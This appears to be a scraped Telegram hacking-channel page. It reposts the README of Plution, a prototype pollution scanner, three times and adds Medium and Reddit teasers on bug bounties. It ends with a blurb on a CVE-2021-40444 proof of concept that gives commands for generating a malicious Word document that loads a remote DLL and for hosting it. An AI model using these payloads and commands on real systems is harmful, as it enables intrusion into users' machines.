Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Plution is a convenient way to scan at scale for pages that are vulnerable (https://www.kitploit.com/search/label/Vulnerable) to client side (https://www.kitploit.com/search/label/Client%20Side) prototype pollution (https://www.kitploit.com/search/label/Prototype%20Pollution) via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: https://github.com/BlackFan/client-side-prototype-pollution/tree/master/pp
What this is not
This is not a one stop shop. Prototype pollution is a complicated beast. This tool does nothing you couldn't do manually. This is not a polished bug-free super tool. It is functional but poorly coded and to be considered alpha at best.
How it works
Plution appends a payload to supplied URLs, naviguates to each URL with headless chrome (https://www.kitploit.com/search/label/Headless%20Chrome) and runs javascript on the page to verify if a prototype was successfully polluted.
how it is used
Basic scan, output only to screen:
cat URLs.txt | plution Scan with a supplied payload rather than hardcoded one:
cat URLs.txt|plution -p '__proto__.zzzc=example'
Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution. Output:
Passing '-o' followed by a location will output only URLs of pages that were successfully polluted. Concurrency:
Pass the '-c' option to specify how many concurrent jobs are run (default is 5)
questions and answers
How do I install it?
go get -u github.com/raverrr/plution why specifically limit it to checking if window.zzzc is defined?
zzzc is a short pattern that is unlikely to already be in a prototype. If you want more freedom in regards to the javascript use https://github.com/detectify/page-fetch instead Got a more specific question?
Ask me on twitter @divadbate.

Download Plution (https://github.com/raverrr/plution)
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!Plution - Prototype Pollution Scanner Using Headless Chrome



Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: https://github.com/BlackFan/client-side-prototype-pollution/tree/master/pp



What this is not

This is not a one stop shop. Prototype pollution is a complicated beast. This tool does nothing you couldn't do manually. This is not a polished bug-free super tool. It is functional but poorly coded and to be considered alpha at best.

How it works

Plution appends a payload to supplied URLs, naviguates to each URL with headless chrome and runs javascript on the page to verify if a prototype was successfully polluted.

how it is used

*
Basic scan, output only to screen:
cat URLs.txt | plution

*
Scan with a supplied payload rather than hardcoded one:
cat URLs.txt|plution -p '__proto__.zzzc=example'
Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

*
Output:
Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

*
Concurrency:


*
Pass the '-c' option to specify how many concurrent jobs are run (default is 5)


questions and answers

*
How do I install it?
go get -u github.com/raverrr/plution

*
why specifically limit it to checking if window.zzzc is defined?
zzzc is a short pattern that is unlikely to already be in a prototype. If you want more freedom in regards to the javascript use https://github.com/detectify/page-fetch instead

*
Got a more specific question?
Ask me on twitter @divadbate.




Download Plution
Plution - Prototype Pollution Scanner Using Headless Chrome

Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: https://github.com/BlackFan/client-side-prototype-pollution/tree/master/ppWhat this is not This is not a one stop shop. Prototype pollution is a complicated beast. This tool does nothing you couldn't do manually. This is not a polished bug-free super tool. It is functional but poorly coded and to be considered alpha at best. How it works Plution appends a payload to supplied URLs, naviguates to each URL with headless chrome and runs javascript on the page to verify if a prototype was successfully polluted. how it is used Basic scan, output only to screen: cat URLs.txt | plution Scan with a supplied payload rather than hardcoded one: cat URLs.txt|plution -p '_proto_.zzzc=example' Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution. Output: Passing '-o' followed by a location will output only URLs of pages that were successfully polluted. Concurrency: Pass the '-c' option to specify how many concurrent jobs are run (default is 5) questions and answers How do I install it? go get -u github.com/raverrr/plution why specifically limit it to checking if window.zzzc is defined? zzzc is a short pattern that is unlikely to already be in a prototype. If you want more freedom in regards to the javascript use https://github.com/detectify/page-fetch instead Got a more specific question? Ask me on twitter @divadbate. Download Plution
Read more...
hacking: security in practice
Previous post about hardware removal to maintain privacy and annonymity explained:

I picked up a Lenovo T250 as I believe IME is not installed on those models. Is there anything else I should physically remove in order to protect my privacy and maintain annonymity while persuing an ethical hacking career? While I will be engaging in legal activities online, something you need to venture over to the dark side to get a better understanding by witnessing both sides of the coin. I'm no longer a novice, but taking these next steps is making me nervous and I have small kiddos whonrely on me. My previous career was of a network engineer and got extremely bored and fast. I plan on running Kali inside of qubesos/whonix. If there is anything in the photo I am about to post, that needs to go, please let me know and if you have the time to explain why, even better. Thank you all, such a great sub.

submitted by /u/cho--e
[link] [comments]
[Symfony]: is a set of reusable PHP components and a PHP framework to build web applications, APIs, microservices and web servicesContinue reading on Medium » (https://u-itachi.medium.com/from-phpinfo-page-to-many-p1-bugs-and-rce-symfony-bce432605662?source=rss------bug_bounty-5)
Not a member of Nexus Mutual? Don’t worry — we’ve got you covered.Continue reading on Nexus Mutual » (https://medium.com/nexus-mutual/bug-bounty-matching-program-with-immunefi-b8933d129a?source=rss------bug_bounty-5)
1*XBTMNifEbG57bYXydcZ6vA.gif
54.4 KB
Hacking on Medium
Top 10 Certification Courses To Kickstart a Career in Cybersecurity


Cybersecurity is the most debated topic since the onset of the pandemic. Why not help the world in protection?

Continue reading on Brandlitic »
Hacking on Medium
Ferrum Network and Lossless Form Strategic Partnership — Lossless Joins the Iron Alliance


Ferrum has joined forces with Lossless to help introduce their ecosystem of partner projects to Lossless’ DeFi Hack mitigation tools.

Continue reading on FerrumNetwork »
Hacking on Medium
Cryptocurrencies are no more anonymous


Do you still believe cryptocurrencies are anonymous? Here is something to disprove your idea.

Continue reading on Medium »
Hacking on Medium
From phpinfo page to many P1 bugs and RCE. [Symfony]


[Symfony]: is a set of reusable PHP components and a PHP framework to build web applications, APIs, microservices and web services

Continue reading on Medium »
Hacking on Medium
Hackers For Hire : Are Hackers for Hire the Future of Global Terrorism?


Hackers For Hire : Are Hackers for Hire the Future of Global Terrorism? — (rebellionresearch.com)

Continue reading on Medium »
From phpinfo page to many P1 bugs and RCE. [Symfony]

Symfony: is a set of reusable PHP components and a PHP framework to build web applications, APIs, microservices and web servicesContinue reading on Medium »
Read more...
CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)You need to install lcab first (sudo apt-get install lcab)Check REPRODUCE.md for manual reproduce stepsIf your generated cab is not working, try pointing out exploit.html URL to calc.cabUsingFirst generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()python3 exploit.py generate test/calc.dll http://<SRV IP>Once you generate the malicious docx (will be at out/) you can setup the server:sudo python3 exploit.py host 80Finally try the docx in a Windows Virtual Machine: Download CVE-2021-40444
Read more...